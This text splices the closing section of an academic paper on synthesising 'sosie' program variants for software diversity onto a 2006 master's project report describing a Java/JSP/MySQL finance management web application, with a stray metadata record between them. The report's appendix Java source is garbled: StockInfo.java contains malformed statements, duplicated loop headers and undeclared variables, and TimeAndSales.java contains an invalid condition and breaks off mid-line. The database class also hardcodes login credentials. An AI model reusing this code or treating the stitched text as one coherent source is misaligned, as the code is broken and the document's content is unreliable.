automatically diversified programs on the same inputs, monitoring behavioral divergences. Franz [11] proposes to adapt compilers for the automatic generation of massive scale software diversity in binaries. None of these papers analyze the cost (in terms of trial, search space size or time) of diversity synthesis and only Feldt explicitly targets computation diversity. Unsound transformations. There is a recent research thread on so-called unsound program transformations [24]. Failure-oblivious computing [23] consists in monitoring invalid memory accesses, and crafting return values instead of crashing, letting the server continue its execution. Following this idea, loop perforation [20] monitors execution time on specific loops and starts skipping iterations, when time goes above a predefined threshold. Automatic program repair [21] also relies on program transformations with no semantic guarantees. For example, Le Goues et al. propose an evolutional technique to transform a program that has a bug characterized by one failing test case into a program for which this test case passes [15]. Carzaniga et al. [3] have a technique for runtime failure recovery based on diverse usages of a faulty software component. Sosiefication exactly goes along this line of research. The code transformations might also introduce differences in behaviors that are not specified. Natural diversity. Sosie synthesis is about artificial, automated software diversity. There is also some “natural software diversity”. For example, there exists a diversity of open source operating systems (that can be used for fault tolerance [17]) or a diversity of virtual machines, useful for moving target defense [4]. Component-based software design is an option for letting a natural resuable diversity of off-the-shelf components [24]. This natural diversity comes from both the market of commercial competitive software solutions and the creativity of the open-source world [12]. 5. CONCLUSION We have explored the efficiency of 9 program transformations that add, delete or replace source code statements, for the automatic synthesis of sosies, program variants that exhibit the same behavior but different computation. We experimented sosie synthesis over 9 Java programs and observed the existence of large quantities of sosies. In total, we were able to synthesize 30 184 sosies. We observed that considering type and variable compatibility is the most efficient in terms of absolute number of sosies and sosiefication speed. We consider this work as an initial step towards controlled and massive unpredictability of software. Next steps include two aspects related to the effectiveness of our process. In the context of moving target defense, one can think of generating sosies on the fly. Thus, one would set requirements on the number of variants to be used, on the number of behavioral moves required to keep attacks hard. Let us assume that one needs to have 10 new variants every hour. In this case, one needs a process that generates at least 10 new variants per hour. Furthermore, there is not only a constraint on the number of new sosies, but also a constraint on the novelty, i.e. the dose of unpredictability that each sosie brings. In this context, novelty search seems to be a good technique. In this line, the key question we would like to answer is: is there an upper limit on the number of sosies one could create practically, or is computational diversity unbounded? 6. REFERENCES
{"Source-Url": "https://hal.archives-ouvertes.fr/hal-00938855/file/sosies.pdf", "len_cl100k_base": 13072, "olmocr-version": "0.1.53", "pdf-total-pages": 12, "total-fallback-pages": 0, "total-input-tokens": 39039, "total-output-tokens": 16089, "length": "2e13", "weborganizer": {"__label__adult": 0.0003552436828613281, "__label__art_design": 0.0002498626708984375, "__label__crime_law": 0.00045609474182128906, "__label__education_jobs": 0.0003817081451416016, "__label__entertainment": 4.70280647277832e-05, "__label__fashion_beauty": 0.00012874603271484375, "__label__finance_business": 0.0001291036605834961, "__label__food_dining": 0.0002543926239013672, "__label__games": 0.0006046295166015625, "__label__hardware": 0.0005936622619628906, "__label__health": 0.0003273487091064453, "__label__history": 0.00015282630920410156, "__label__home_hobbies": 6.443262100219727e-05, "__label__industrial": 0.0002142190933227539, "__label__literature": 0.00020062923431396484, "__label__politics": 0.0002281665802001953, "__label__religion": 0.0003101825714111328, "__label__science_tech": 0.0062103271484375, "__label__social_life": 7.11679458618164e-05, "__label__software": 0.005374908447265625, "__label__software_dev": 0.98291015625, "__label__sports_fitness": 0.00023472309112548828, "__label__transportation": 0.00029850006103515625, "__label__travel": 0.00014579296112060547}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 62011, 0.06883]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 62011, 0.34895]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 62011, 0.86158]], "google_gemma-3-12b-it_contains_pii": [[0, 520, false], [520, 5771, null], [5771, 10812, null], [10812, 17652, null], [17652, 22398, null], [22398, 26743, null], [26743, 31877, null], [31877, 35654, null], [35654, 42531, null], [42531, 49427, null], [49427, 56195, null], [56195, 62011, null]], "google_gemma-3-12b-it_is_public_document": [[0, 520, true], [520, 5771, null], [5771, 10812, null], [10812, 17652, null], [17652, 22398, null], [22398, 26743, null], [26743, 31877, null], [31877, 35654, null], [35654, 42531, null], [42531, 49427, null], [49427, 56195, null], [56195, 62011, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 62011, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 62011, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 62011, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 62011, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 62011, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 62011, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 62011, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 62011, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 62011, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 62011, null]], "pdf_page_numbers": [[0, 520, 1], [520, 5771, 2], [5771, 10812, 3], [10812, 17652, 4], [17652, 22398, 5], [22398, 26743, 6], [26743, 31877, 7], [31877, 35654, 8], [35654, 42531, 9], [42531, 49427, 10], [49427, 56195, 11], [56195, 62011, 12]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 62011, 0.16092]]}
olmocr_science_pdfs
2024-12-10
2024-12-10
bda6e44ea5242de75d73a85f0e7cdd8e1bae9d42
Real-time finance management system Abdul Muqtadir Follow this and additional works at: https://scholarworks.lib.csusb.edu/etd-project Recommended Citation This Project is brought to you for free and open access by the John M. Pfau Library at CSUSB ScholarWorks. It has been accepted for inclusion in Theses Digitization Project by an authorized administrator of CSUSB ScholarWorks. For more information, please contact scholarworks@csusb.edu. REAL-TIME FINANCE MANAGEMENT SYSTEM A Project Presented to the Faculty of California State University, San Bernardino In Partial Fulfillment of the Requirements for the Degree Master of Science in Computer Science by Abdul Muqtadir. March 2006 REAL-TIME FINANCE MANAGEMENT SYSTEM A Project Presented to the Faculty of California State University, San Bernardino by Abdul Muqtadir March 2006 Approved by: Dr. Ernesto Gomez, Chair, Computer Science Dr. Richard Botting Dr. Keith Schubert 3/6/2006 © 2006 Abdul Muqtadir ABSTRACT Almost everybody earns money in this world, but very few of them actually spend it in a wise way. There is no doubt that managing finances will help anybody to have a secure and safe financial future. I have attempted to solve this problem by creating a Real-Time Finance Management System (RFMS) wherein users can easily manage their finances. RFMS will also help users to learn more about stocks. They can create a sample portfolio of stocks and monitor them closely to see which direction their picked stocks are headed. Graphs have been provided in the system for them to easily visualize and see the numbers in a clear perspective. Apart from stocks RFMS helps the users to manage their finances using the different finance management tools and calculators provided. This is a Java/XML based approach where-in real-time market data from different stock exchanges is fetched and displayed for the user. This is done internally using a data access layer. The information we get is in an XML format, which is taken by the Java program and displayed, using Java Server Pages. ACKNOWLEDGMENTS First and foremost I would like to thank my parents for putting in me the desire and the importance of education. I also thank them for giving me the strength and confidence that I can achieve anything in life. During the course of my project and writing the thesis there have been people who gave support both academically and professionally. I would like to thank my advisor Dr. Ernesto Gomez and my committee members Dr. Botting and Dr. Schubert for giving me the education and encouragement for my project. I would also like to thank my friends and family for the confidence that they have given me. # TABLE OF CONTENTS | ABSTRACT | .......................................................... | iii | | ACKNOWLEDGMENTS | .................................................. | iv | | LIST OF FIGURES | .................................................. | viii | ## CHAPTER ONE: SOFTWARE REQUIREMENTS SPECIFICATION 1.1 Introduction .............................................. 1 1.2 Purpose of the Project ................................. 2 1.3 Context of the Problem ................................. 2 1.4 Related Work ................................................. 2 1.5 Significance of the Project ......................... 3 1.6 Assumptions and Limitations ..................... 3 1.7 Definition of Terms ........................................ 4 ## CHAPTER TWO: SOFTWARE DESIGN 2.1 Introduction .................................................. 9 2.2 Preliminary Design ......................................... 9 2.3 Detailed Design ........................................... 13 2.4 System Setup ................................................ 17 2.5 Summary ..................................................... 19 ## CHAPTER THREE: SYSTEM VALIDATION 3.1 Introduction .................................................. 20 3.2 Unit Test Plan ............................................... 20 3.3 Integration Test Plan ..................................... 21 3.4 System Test Plan ........................................... 24 ## CHAPTER FOUR: MAINTENANCE 4.1 Introduction .................................................. 25 vi <table> <thead> <tr> <th>Figure</th> <th>Description</th> <th>Page</th> </tr> </thead> <tbody> <tr> <td>1</td> <td>Administrator Use Case Diagram</td> <td>11</td> </tr> <tr> <td>2</td> <td>User Use Case Diagram</td> <td>11</td> </tr> <tr> <td>3</td> <td>3-Tier Architecture Diagram</td> <td>13</td> </tr> <tr> <td>4</td> <td>Model 1 Architecture Diagram</td> <td>15</td> </tr> <tr> <td>5</td> <td>Login Page</td> <td>29</td> </tr> <tr> <td>6</td> <td>Portfolio Management Page</td> <td>30</td> </tr> <tr> <td>7</td> <td>Get Stock Quote Page</td> <td>31</td> </tr> <tr> <td>8</td> <td>Get Top Trading Stock List</td> <td>32</td> </tr> <tr> <td>9</td> <td>Time and Sales Report</td> <td>33</td> </tr> <tr> <td>10</td> <td>Reminder Setup Page</td> <td>34</td> </tr> <tr> <td>11</td> <td>Debt Reduction Planning Page</td> <td>35</td> </tr> <tr> <td>12</td> <td>Expenditure Analysis Page</td> <td>36</td> </tr> <tr> <td>13</td> <td>Account Information Page</td> <td>37</td> </tr> <tr> <td>14</td> <td>Balance Check Book Page</td> <td>38</td> </tr> </tbody> </table> CHAPTER ONE SOFTWARE REQUIREMENTS SPECIFICATION 1.1 Introduction Almost everybody earns money in this world, but very few of them actually spend it in a wise way. There is no doubt that managing finances will help anybody to have a secure and safe financial future. I have attempted to solve this problem by creating a Real-Time finance management system - RFMS, wherein users can easily manage their finances. RFMS will also help users to learn more about stocks. They can create a sample portfolio of stocks and monitor them closely to see which direction are their picked stocks headed. Graphs have been provided in the system for them to easily visualize and help them see the numbers in a clear perspective. Apart from stocks RFMS helps the users to manage their finances using the different finance management tools and calculators provided. This is a Java/XML based approach where real-time market data from different stock exchanges is fetched and displayed for the user. This is done internally using a data access layer. The information we get is in an XML format which is taken by the Java program and displayed using Java Server Pages. The project divides finance management into 4 general categories. These include Portfolio Management, Reminders, Debt Management, and Account Management. Each of these categories has different tools to help users with their finances. 1.2 Purpose of the Project The purpose of the project was to develop an online finance management system where the users can learn and manage their stock portfolio and personal finances which would help them have control over their investments, personal finances or debts. 1.3 Context of the Problem The context of the problem was to address issues of personal finance management and problems of having to do so from one place. Also proprietary software had to be installed on every computer the users want to use for managing their finances. 1.4 Related Work There has been a lot of work done in the field of personal finance management software, but most of the work is done for stand-alone systems where the users usually have to buy and install proprietary software on their computer. 1.5 Significance of the Project RFMS was developed for providing a one stop place for dealing with most of the problems in personal finance management. The users are under no obligation to use this tool a set number of times. Based on their present situation the users can use the different tools provided in the system. 1.6 Assumptions and Limitations The following assumptions and limitations were made regarding the project: 1. To manage accounts using RFMS users need to enter their daily transactions into the system. 2. Users have all the required data for Credit Card Pay-Down such as Beginning Balance, Annual Percentage Rate and the Minimum Payment amounts. 3. User should have at least a very basic knowledge about stocks and managing portfolios. 4. The interest calculations used in the system are either Simple Interest or Compound Interest Calculations. Sun’s Java platform for multi-tier server oriented enterprise applications. 6. JDK - Java Development Kit, A free Sun Microsystems product which provides the environment required for programming in Java. The JDK is available for variety of platforms, such as Sun Solaris, Microsoft Windows and Linux. 7. JVM - Java Virtual Machine. It is a software that interprets and executes the byte code in Java class files. 8. JDBC - Java Database Connectivity. A programming interface that lets Java applications access a database via the SQL Language. 9. JSP - JavaServer Page, an extension to the Java servlet technology from Sun Microsystems that provides a simple programming vehicle for displaying dynamic content on a web page. 10. JavaBean - A component architecture for the Java programming language, developed initially by Sun, but now available from several other vendors. JavaBeans components are called “Beans”. 11. JavaScript - A Scripting Language that is widely supported in the web browsers and other web tools. It adds interactive functions to HTML pages which are otherwise static. 12. XML - The Extensible Markup Language (XML) is a W3C-recommended general-purpose markup language for creating special-purpose markup languages. It is a simplified subset of SGML, capable of describing many different kinds of data. Its primary purpose is to facilitate the sharing of data across different systems, particularly systems connected via the Internet. Languages based on XML (for example, RDF, RSS, MathML, XHTML, SVG, and cXML) are defined in a formal way, allowing programs to modify and validate documents in these languages without prior knowledge of their form. 13. JAXP - JAXP or Java API for XML Parsing is an optional API provided by JavaSoft. It provides basic functionality for reading, manipulating, and generating XML documents through pure Java APIs. It is a thin and lightweight API that provides a standard way to seamlessly integrate any XML-compliant parser with a Java application. 14. JDOM - JDOM is a Java-based document object model for XML that integrates with Document Object Model (DOM) and Simple API for XML (SAX) and uses parsers to build the document. 15. XERCES - Xerces is a set of parsers compatible with Extensible Markup Language (XML). Xerces parsers are available for Java and C++, implementing World Wide Web Consortium (W3C) XML, Document Object Model (DOM), and Simple API for XML (SAX) standards. 16. SAX - SAX or Simple API for XML is an event-driven, serial-access mechanism for accessing XML documents. Provides a standardized interface for the interaction of applications with many XML tools. SAX uses two basic types of objects, Parser and Document Handlers. 17. SOAP - Simple Object Access Protocol SOAP is a lightweight protocol for exchange of information in a decentralized, distributed environment. It is an XML based protocol that consists of three parts: an envelope, a set of encoding rules, and a convention for representing remote procedure calls and responses. 18. DOM - Document Object Model (DOM) is a form of representation of structured documents as an object-oriented model. DOM is the official World Wide Web Consortium (W3C) standard for representing structured documents in a platform- and language-neutral manner. The DOM is also the basis for a wide range of application programming interfaces, some of which are standardized by the W3C. 19. REST - Representational State Transfer is a model for web services based solely on HTTP. REST takes the view that the Web already has everything necessary for web services, without having to add extra specifications like SOAP and UDDI. Any item can be made available (i.e. represented) at a URI, and, subject to the necessary permissions, it can be manipulated using one of the simple operations defined within HTTP (GET to retrieve information, PUT and POST to modify it, DELETE to remove it). 20. RFMS - Real-Time Finance Management System. This is the name of the directories where the .jsp files of RFMS are stored in tomcat. The same name has been used for the database of RFMS as well. 2.1 Introduction Chapter Two consists of a discussion of the software design. Specifically, RFMS is a JSP based system that resides on three-tier architecture. The front-end was based on JSP, and the back-end was a MySQL database. The connections to the database are made through the Java Beans with a JDBC connection. 2.2 Preliminary Design RFMS is a system designed for users to manage their finances using the tools provided in the system. It was developed to overcome the following issues: 1. Getting the price for one stock at a time and basically managing your own portfolio of stocks. 2. Using actual money to learn and play around with stocks. This is an expensive mistake; users should have a lot of knowledge before they get into the stock market. 3. Using different reminders systems and still forgetting to pay bills on time. 4. Paying more interest than required in loans such as Student Loans, Car Loans, and Mortgages. 5. Difficulty in analyzing information from budget creation and maintenance. 6. Overdrawing and ruining your credit by simple mistakes of not balancing your check book as it requires too many calculations. A robust, flexible and user-friendly system was needed and RFMS was an implementation that solved most of the issues. Choosing the architecture was an important part. RFMS uses the 3 tier architecture that provides the user interfaces through the web browser. All the user interfaces are divided based on user type. The users are of 2 types: - System Administrator - User The use case diagrams showing the individual functions of all the users are given in the following figures: Figure 1. Administrator Use Case Diagram Figure 2. User Use Case Diagram 2.3 Detailed Design Architecture: RFMS has a 3-tier architecture. A 3-tier architecture was considered since the 2-tier architecture combines both the presentation logic with the business logic in one tier called the client side. The other tier called the server provides the database. The 3-tier architecture separates the business logic from the presentation logic and has the database in the third tier. This architecture is very flexible and has high scalability. Figure 3. 3-Tier Architecture Diagram A. Client Tier: The Java enabled web browsers are used as client tier. The user sends requests via the browser. The browser then sends the request to the Java Beans residing at the application server that process the request and send it back to the browser which in turn interprets the information it receives from the server and displays graphically for the client. B. Middle Tier: The middle tier is also known as the application server. RFMS was designed to run in Jakarta Tomcat-5.0.30 web server. Tomcat supports JSP and JavaBeans which are the programming techniques used in the system. C. Database Server Tier: The database tier is the back end application server where the data is stored. RFMS uses MySQL version 4.0.23-nt. MySQL provides very fast joins using an optimized one-sweep multi-join. You can connect MySQL to Tomcat using a MySQL driver. Programing Technique and Language: The programming language used by RFMS was Java and its JSP technology. JSP standard was developed by Sun Microsystems as an alternative to Microsoft's active server page (ASP) technology. JSP pages are similar to ASP pages in the fact that they are compiled on the server, rather than in a user's Web browser. However, JSP is Java-based, whereas ASP is Visual Basic-based. JSP pages are useful for building dynamic Web sites and accessing database information on a Web server. Though JSP pages may have Java interspersed with HTML, all the Java code is parsed on the server. Therefore, once the page gets to the browser, it is only HTML. JavaScript, on the other hand, is usually parsed by the Web browser, not the Web server. The other benefits of JSP that made it a choice over other technologies are: 1. JSP separates program logic from the presentation. 2. JSP pages have the “Write Once, Run Anywhere” property. By virtue of their ultimate translation to Java byte code, JSP pages are platform independent. This means that JSP pages can be developed on any platform and deployed on any server. 3. JSP pages also make it easy to embed reusable components like JavaBeans that perform specialized tasks. JavaBeans are developed once and can be used in any number of Java Server Pages. 4. JSP technology has become a part of the J2EE which brings Java technology to enterprise computing. Using JSP pages for constructing a website, we can create a front-end component of the type of powerful N-tier applications made possible by J2EE. 5. JSP has custom tag libraries that make it highly extensible. These numerous characteristics of JSP made it a good choice for RFMS. The JavaBeans used in RFMS are: 1. StockInfo 2. Users 3. UsersAdmin 4. TimeAndSales 5. TopList 6. DateBean 7. Reminder 8. DebtPlanner 9. Expenditure 10. AccountInfo 2.4 System Setup RFMS's development system involved the following steps: 1. Installation of J2SDK 1.4.2_06. The Java 2 SDK is a development environment for building applications, applets, and components using the Java programming language. The Java 2 SDK includes tools useful for developing and testing programs written in the Java programming language and running on the Java platform. These tools are designed to be used from the command line. Except for the appletviewer, these tools do not provide a graphical user interface. 2. Install Tomcat - Servlet/JSP container. RFMS uses Tomcat version 5.0.30 which implements the Servlet 2.4 and JavaServer Pages 2.0 specifications from the Java Community Process, and includes many additional features that make it a useful platform for developing and deploying web applications and web services. 3. Install the MySQL database server: RFMS uses MySQL version 4.0.23-nt. The MySQL (R) software delivers a very fast, multi-threaded, multi-user, and robust SQL (Structured Query Language) database server. MySQL Server is intended for mission-critical, heavy-load production systems as well as for embedding into mass-deployed software. 4. Install a JDBC Driver: RFMS uses MySQL Connector/J which is a native Java driver that converts JDBC (Java Database Connectivity) calls into the network protocol used by the MySQL database. It lets developers working with the Java programming language easily build programs and applets that interact with MySQL and connect all corporate data, even in a heterogeneous environment. MySQL Connector/J is a Type IV JDBC driver and has a complete JDBC feature set that supports the capabilities of MySQL. 5. Make changes in the server.xml and web.xml files in the application server to establish connectivity between tomcat and MySQL. 6. Test your web application. The client can have any operating system such as Windows 95/98/NT/2000/XP workstation, Mac OS, OS/2, UNIX, Linux etc. The browsers that the client can use for viewing HTML documents and using RFMS are Netscape Navigator 3.0 or higher or Microsoft’s Internet Explorer 3.x or higher. 2.5 Summary The software design of the project was presented in Chapter Two and it the underlying structure of the application developed. RFMS was a 3-tier architecture based web application that provides interfaces in HTML for the clients. The data is retrieved from a MySQL database through JavaBeans and sent to the browsers by JSP pages. CHAPTER THREE SYSTEM VALIDATION 3.1 Introduction This chapter provides the procedures in which RFMS - Real-Time Finance Management System was tested and the results gathered from it. It was tested on Microsoft’s Internet Explorer Browser. 3.2 Unit Test Plan RFMS - A Real-Time Finance Management System was a web-based application that helps users manage their finances by using the tools provided in the system. The users can input their financial information online and analyze it irrespective of where they are. As part of the Unit Test Plan, RFMS was tested based on the user types since each user has its own set of interfaces. All the interfaces are web based and available through the browser. As part of the unit test plan these steps were taken and results found: 1. All the hyperlinks available in each set of interfaces of RFMS were checked, irrespective of the content that they provide. It was found that all of them do work. 2. User data input was given to check if the presentation logic worked. The presentation logic was implemented in JavaScript, which checks if the input taken from the users was valid. The display was in HTML. The Interfaces of RFSM that required user input successfully validated it. 3. There are error pages that display the errors based on the functionality. 4. JavaScript displays the errors in the input of entries in alert boxes. 5. The basic rules of web based applications of readability and presentation for each set of Interfaces was verified. The data and content was readable and displayed in a user-friendly manner. 3.3 Integration Test Plan As part of the Integration Test Plan, RFMS was tested for functionality based on its user-type. The users have their own interfaces and after being tested as single units and their presentation they were tested based on functionality. The functions of each user are as follows: A. Systems Administrator: - Create user account • Edit user account • Delete user account • View User Information B. User • Manage Portfolio • Setup Reminders • Debt Reduction Planning • Account Information Every set of functions is available on the left hand side of the browser as a menu. The following tests were performed and results obtained: 1. RFMS’s user interfaces were tested now for content across each page depending on the functionality. 2. Every function of each user was tested. 3. A user was created as part of the administrator pages. After the information was entered the functions of edition, deleting and final viewing of all information was done. RFMS’s Systems Administrator pages tests passed successfully. 4. The user functionality was tested for bugs and limitations. Each function was checked for content and right response. 5. Certain limitations were found which have been documented and the bugs were fixed. 6. The portfolio management section was checked if it was able to get data over the internet from the inetat website. This passed successful. 7. The Reminder section was thoroughly tested to see if it was able to send outgoing email at the exact specified time, it was able to do it without any problem. 8. The different tools in the debt reduction planning were checked to see if all the formulas used in there were correct. The system was able to perform these tasks even with wrong input values. 9. The account information page was checked to see if the balance check book tool matches a real balance book. 3.4 System Test Plan As part of the System Test Plan, the following tests were performed: 1. The JSP server and the MySQL server were started and the system start page was opened in the browser successfully. 2. Tested to see that unauthorized users cannot view pages. They cannot get past the login page. 3. Tested to see if XML queries are being processed properly, they were being processed as expected. 4. Tested to see if reminder email system was able to send out emails and found that it doing it without any problems. 5. The graphs for the expenditure analysis page needs data for two months to be able to display the comparison, it gives an error message if data for at least two months is not available. 6. Balance check book sections was tested to see if users modified an earlier entry then the system should be able to recalculate all the entries again. The test was passed. CHAPTER FOUR MAINTENANCE 4.1 Introduction This chapter provides the measures that need to be taken to maintain RFMS - A Real-Time Finance Management System. Maintenance needs to be done if: 1. Issues arise on the front-end of the application or the back-end programming. 2. Issues with the tools utilized for development. 3. Issues with the directory structure of the application. 4.2 Maintenance Guidelines These guidelines aim at providing the information for maintenance issues that might arise depending on the user-type and the front end of the application as well as depending on the programming and servers at the backend of the application. 4.2.1 Interfaces Management The programming has been done in JSP and Java and RFMS has been tested for all the functionality. But if issues arise then the Webmaster will have to know Java, JSP, JavaScript, XML and MySql to troubleshoot problems in the business logic of the application. 4.2.2 Administration A Systems Administrator/webmaster is needed to create, edit or delete accounts. 4.3 Tools Utilized RFMS was developed using the following tools: 1. Tomcat Web Server 2. MySql Database Server 3. Java 2 Standard Development Kit 4. JDBC Driver 5. Macromedia Dreamweaver 4.4 Directory Structure RFMS used Apache's Jakarta Tomcat server as the JSP/Servlet container. The web application was developed in the "webapps" sub-directory of the Jakarta Tomcat main directory. It was stored in a directory under "webapps" called "rfms". The files present at each directory level: rfms directory All the .jsp and .html files are saved here. The naming convention followed can be explained by an example of a create user admin page: 1. Presentation page: createUser.jsp. 2. JavaScript Code for user-input validation: createUserCheck.jsp. 3. JSP servlet page for communication with the JavaBeans that insert the data: createUserInsert.jsp. The common files used by all the users are placed directly under "rfms", but all the other pages are placed in sub-directories based on their user-type first and then their functionality. The sub-directories under "rfms" are: 1. admin - The administrator pages. 2. portfolio - The stock management pages. 3. reminder - The email reminder pages. 4. debt - The debt reduction planning pages. 5. expenditure - The expenditure analysis pages. 6. accountInfo - The account information pages. 4. web-inf - This directory has the .java files stored in it and the respective .class files are stored in another sub-directory package in it called rfms_modules. 5.1 Introduction This chapter provides details about the implementation of the project by describing some of the interfaces used in the project. The RFMS's front-end was tried to be made as user-friendly as possible. JavaScript was used on the client side to check for the validity of user's input. Error messages were reported appropriately wherever it was needed. The Real-Time Finance Management System - RFMS was developed to help users control and plan their finances. Various aspects of finance are considered in the project. These include: 1. Portfolio Management 2. Reminder Setup 3. Debt Reduction Planning 4. Expenditure Analysis 5. Account Information Apart from these pages there was a system login process which was required to authenticate users. 5.2 System Interfaces 5.2.1 Login The login process authenticates users based on the username and password provided by them. ![Login Page](image) Figure 5. Login Page 5.2.2 Portfolio Management This section had three tools present in it: 1. Get Quote 2. Get Top Trading List 3. Get Time and Sales Report for a Stock Figure 6. Portfolio Management Page The three tools provided in this section gets updated Real-Time Market information when the markets are open. Figure 7. Get Stock Quote Page The get quote section retrieves a quote and market information based on the symbol provided by the user. Figure 8. Get Top Trading Stock List This page gets the top 20 trading list by default. If needed, we can ask the system to get up to 500 top trading stocks at that time. This page gets the last 25 matched deals for a particular stock. Again, 25 is just the default the maximum number of matched deals it can retrieve in one call is 100. 5.2.3 Reminder Setup This section consists of setting up reminders for oneself. The system sends out an email at the particular day the reminder is set up to. Here the users were able to set reminders for themselves. The system used to allow them to set up to two reminders for each event. 5.2.4 Debt Reduction Planning This sections a loan calculator to figure out the details of any loan. You could get information like how much interest will you pay over the term of the loan or how much will your loan payments per month will be. Figure 11. Debt Reduction Planning Page Just by entering a few details such as loan amount, the term and the interest rate users could get valuable information such as the monthly payments and the total interest they will be paying over the life of the loan. 5.2.5 Expenditure Analysis This is the section where the users enter their monthly expenses every month and then they can use this information to see graphs and charts on their expenses so that they can better analyze their budget for the upcoming months. Here the users enter their monthly expenses based on the categories provided. The users also had the ability to add new categories that are specific to them. 5.2.6 Account Information This section has a balance check book tool. This facilitates the users to balance their check book from anywhere. Calculations are done for the user by the system. All the user has to do is to enter the transactions. Figure 13. Account Information Page This is the page where the users enter their transactions. Based on the transaction type the system determines if it was a debit/credit transaction and calculations are done on that basis. Figure 14. Balance Check Book Page This page displays the user's balance book. It also gives the ability to edit a previous transaction or to enter new transactions. CHAPTER SIX CONCLUSIONS AND FUTURE DIRECTIONS 6.1 Conclusions RFMS - A Real-Time Finance Management System was a personal finance management system which provides real-time market data from stock exchanges. When the stock exchange is open the data is delayed by less than 15 minutes. Users can use RFMS to learn more about stocks in general and learn to trade by using virtual money. RFMS also provides users with other tools such as reminder system which sends email to remind you about events, a few loan calculators, a budgeting system that graphs the user’s expenses and a balance check book tool. Passing XML data over HTTP is the latest in EDI (Electronic Data Interchange) standards. Java Combined with XML provides developers with powerful tools to develop internet based applications. The real-time stock data is retrieved using REST architecture. REST - Representational State Transfer is a model for web services based solely on HTTP. REST takes the view that the Web already has everything necessary for web services, without having to add extra specifications like SOAP and UDDI. RFMS used Java and XML to get this data using REST architecture. Part of this data was stored in a database. MySql database was used to store information on user’s calculations so that they don’t have to enter it the next time they use the system. 6.2 Future Directions Personal Software Management Software is used by almost everyone these days to keep track of their finances. A typical person could have multiple bank accounts, multiple credit cards, a few investment accounts, and lots of bills. So this field is here to stay and many more tools will be required by people in the future. In future not only stock information but also bank, credit card and bills information can be transferred over the internet using the REST architecture. This will help users to transport their data from one system to another without any problems. Technology usage wise, Servlets or Java Struts were not used in RFMS, but if the application is expanded to include more tools then using those would benefit a lot. Also trying to utilize XML to the fullest will make development and/or maintenance easy to manage. Tools: the more the better. There is no limit on the number of different tools that could be provided for the users. Dealing with variable loans, mortgages and creating amortization tables for those will help users see what part of their money is actually going towards the principal. Taxes: One more limitless field. Tools could be provided which keeps track of user’s expenses and at the end of the year prepares a statement for the user which would help the users file their taxes. Finally and once again, use XML to send data back and forth between applications. Using XML cannot be stressed enough; XML makes the task of transferring data from one application to another a breeze. APPENDIX SOURCE CODE OF JAVA CLASSES Here is the source code from some of the files used in Real-Time Finance Management System. **database.java** ```java //java document package rfms_modules; import java.sql.*; public class database { private static String url="jdbc:mysql://localhost/rfms"; private static String driver="com.mysql.jdbc.Driver"; private static String user="mac"; private static String password="rfms"; public static Connection getConnection() throws Exception { Class.forName(driver).newInstance(); //System.out.println("driver Loaded"); Connection connection = DriverManager.getConnection(url,user,password); //System.out.println("connection established"); return connection; } } ``` DateBean.java // Java Document package rfms_modules; import java.io.*; import org.jdom.*; import org.jdom.input.*; import org.jdom.output.*; import java.util.*; import java.util.Date; public class DateBean { public static void main(String[] args) { //System.out.println(getSingleQuote("MSFT"); } public static Date getDate(String symbol) { return new java.util.Date(); } public static String getSingleQuote(String symbol) { String name = ""; return (name); } } StockInfo.java // Java Document for qoute.xml package rfms_modules; import java.io.*; import org.jdom.*; import org.jdom.input.*; import org.jdom.output.*; import java.util.*; import org.apache.xerces.parsers.*; public class StockInfo { public static String marketSession = ""; public static String matchedShares = ""; public static String matchPrice = ""; public static String matchTime=""; public StockInfo() { marketSession = ""; matchedShares = ""; matchPrice = ""; matchTime=""; } public static String getMarketSession() { return marketSession; } public static String getMatchedShares() { return matchedShares; } public static String getMatchPrice() { return matchPrice; } } public static String getMatchTime() { return matchTime; } public static void setMarketSession(String ms) { marketSession = ms; } public static void setMatchedShares(String ms2) { matchedShares = ms2; } public static void setMatchPrice(String mp) { matchPrice = mp; } public static void setMatchTime(String mt) { matchTime = mt; } public static void main(String[] args) { System.out.println(getSingleQuote("ORCL")); System.out.println(""+getMatchPrice()); System.out.println("Date: "+getDate()); } public static Date getDate(){ return(new java.util.Date()); } public static String getSingleQuote(String symbol) { String name = "asdf1111"; try { String x = Document d = new SAXBuilder().build(x); Element e = new Element("islandData"); List children = d.getRootElement().getChildren(); for (Iterator i = children.iterator(); i.hasNext(); ) { for (int i = 0, size = children.size(); i < size; i++) { Element child = i.next(); Element child = (Element) children.get(i); if (child instanceof Element) { // name += child.toString(); Element e2 = (Element) child; name += e2.getName(); } name += child.getName(); name += "<br>"; } } name += child.getName(); name += "<br>"; Element temp = d.getRootElement().getChild("stock").getChild("matched"); setMarketSession(temp.getAttribute("marketSession") .getValue()); setMatchedShares(temp.getChild("matchedShares") .getValue()); setMatchPrice(temp.getChild("lastMatch") .getChild("matchPrice").getValue()); setMatchTime(temp.getChild("lastMatch") .getChild("matchTime").getValue()); } catch (Exception e) { e.printStackTrace(); return ("There was a exception" + e); } return (name); TimeAndSales.java / Java Document for timeandsales.xml package rfms_modules; import java.io.*; import org.jdom.*; import org.jdom.input.*; import org.jdom.output.*; import java.util.*; import org.apache.xerces.parsers.*; public class TimeAndSales { public static void main(String[] args) { Document d1 = buildDocument("MSFT", 20); //displayTopList(d1); } // end main public static Date getDate() { return new java.util.Date(); } } // end getDate public static Document buildDocument(String symbol, int recNumb) { if (!recNumb > 0) { recNumb = 20; } try { String timeAndSales = 